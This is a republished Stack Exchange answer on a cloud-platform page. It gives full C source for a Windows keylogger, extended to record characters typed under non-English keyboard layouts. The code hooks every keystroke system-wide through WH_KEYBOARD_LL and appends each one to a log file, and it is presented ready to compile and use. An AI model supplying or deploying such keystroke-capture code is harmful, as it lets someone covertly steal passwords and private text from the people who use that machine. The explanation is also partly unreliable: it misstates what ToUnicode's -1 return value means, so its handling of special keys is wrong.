You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

如何让Windows键盘钩子记录对应输入法的本地语言字符?

Fixing Multilingual Character Capture in Your Keylogger

Alright, let's tackle this problem head-on. Your current keylogger uses WM_KEYDOWN to capture virtual key codes, which map to physical keys instead of the actual characters generated by the active input method. That's exactly why you're seeing '3' instead of 'š'—the virtual key code for that key is the same across layouts, but the character it produces depends on the keyboard language and IME you're using.

The solution you mentioned—leveraging the system's character translation logic—is on the right track. Since we're working with a global low-level keyboard hook (WH_KEYBOARD_LL), we'll use the ToUnicode function to convert virtual key codes into the actual Unicode characters that match the current input context. Here's how to modify your code to support multilingual input:

Modified Code

#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <stdio.h>
#include <wchar.h>
#include <string.h>

HHOOK _hook;
FILE* LOG;

LRESULT __stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode >= 0 && wParam == WM_KEYDOWN) {
        KBDLLHOOKSTRUCT* kbdStruct = (KBDLLHOOKSTRUCT*)lParam;
        wchar_t unicodeChar[2] = {0};
        BYTE keyboardState[256];
        
        // Get current state of modifier keys (Shift, Caps Lock, etc.)
        GetKeyboardState(keyboardState);
        
        // Convert virtual key code to Unicode character, respecting layout/IME
        int conversionResult = ToUnicode(
            kbdStruct->vkCode,
            kbdStruct->scanCode,
            keyboardState,
            unicodeChar,
            1,
            0
        );

        if (conversionResult > 0) {
            // Convert Unicode to UTF-8 for universal log compatibility
            char utf8Char[10];
            int utf8Length = WideCharToMultiByte(
                CP_UTF8,
                0,
                unicodeChar,
                1,
                utf8Char,
                sizeof(utf8Char),
                NULL,
                NULL
            );
            
            if (utf8Length > 0) {
                fprintf(LOG, "%s", utf8Char);
            }
        } else if (conversionResult == -1) {
            // Handle special non-character keys
            switch (kbdStruct->vkCode) {
                case VK_ESCAPE:
                    fprintf(LOG, "[ESC]");
                    break;
                case VK_BACK:
                    fprintf(LOG, "[BACKSPACE]");
                    break;
                case VK_TAB:
                    fprintf(LOG, "[TAB]");
                    break;
                case VK_RETURN:
                    fprintf(LOG, "[ENTER]\n");
                    break;
                case VK_CAPITAL:
                    fprintf(LOG, "[CAPS_LOCK_TOGGLE]");
                    break;
                // Add more special keys here as needed
            }
        }
        fflush(LOG);
    }
    return CallNextHookEx(_hook, nCode, wParam, lParam);
}

void SetHook() {
    _hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0);
}

int main() {
    // Open log in binary mode to preserve UTF-8 encoding
    LOG = fopen("log.txt", "ab+");
    if (!LOG) {
        MessageBox(NULL, L"Failed to open log file", L"Error", MB_ICONERROR);
        return 1;
    }

    // Write UTF-8 BOM to ensure editors recognize the encoding
    const char utf8Bom[] = {0xEF, 0xBB, 0xBF};
    fwrite(utf8Bom, sizeof(utf8Bom), 1, LOG);

    SetHook();

    MSG msg;
    // TranslateMessage is critical for proper IME processing
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    fclose(LOG);
    return 0;
}

Key Changes Explained

  • ToUnicode Function: This is the core fix. It takes the virtual key code, scan code, and current keyboard state, then returns the exact Unicode character the system produces for that keypress—including characters from Slovak, Czech, or any active input method.
  • UTF-8 Encoding: We convert Unicode characters to UTF-8 before writing to the log. This ensures any modern text editor can correctly display multilingual characters without encoding issues. The UTF-8 BOM at the start helps editors identify the encoding.
  • Keyboard State Capture: GetKeyboardState fetches modifier key states, which ToUnicode needs to produce the correct character (e.g., uppercase vs lowercase, Shift-modified special characters).
  • Special Key Handling: When ToUnicode returns -1, we're dealing with non-character keys (like ESC or Backspace). We log these with descriptive labels instead of garbage characters.
  • TranslateMessage in Message Loop: This function is essential for IME processing—it helps the system convert raw key presses into formatted characters (like accented letters or complex scripts).

Why Your Original Code Failed

Your original code directly output the virtual key code as a character (%c, kbdStruct.vkCode). Virtual key codes represent physical keys, not the characters they produce. For example, the key that outputs "3" in English outputs "š" in Slovak, but both share the same virtual key code. ToUnicode bridges this gap by accounting for the active keyboard layout and IME.

内容的提问来源于stack exchange,提问作者Sheldon

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.13 08:25:35